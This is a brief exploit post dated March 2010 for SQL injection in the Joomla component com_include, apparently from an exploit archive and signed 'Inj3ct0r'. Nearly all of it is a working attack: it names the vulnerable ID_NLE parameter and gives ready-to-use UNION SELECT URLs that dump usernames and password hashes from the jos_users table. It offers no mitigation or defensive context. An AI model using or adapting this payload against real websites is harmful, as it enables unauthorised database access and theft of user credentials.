Joomla Component com_include SQL Injection Vulnerability
Posted on 17 March 2010
======================================================== Joomla Component com_include SQL Injection Vulnerability ======================================================== [~]######################################### ExploiT #############################################[~] [~] Vulnerable File : http://127.0.0.1/index.php?option=com_include&lang=en_GB&Itemid=50&ID_NLE=[SQL] [~] ExploiT : -1 UNION SELECT 1 [~] Example : http://127.0.0.1/index.php?option=com_include&lang=en_GB&Itemid=50&ID_NLE=-1 UNION SELECT concat(username,0x3a,password) FROM jos_users [~] Demo : http://server/index.php?option=com_include&lang=en_GB&Itemid=50&ID_NLE=-1 UNION SELECT concat(username,0x3a,password) FROM jos_users # ~ - [ [ : Inj3ct0r : ] ]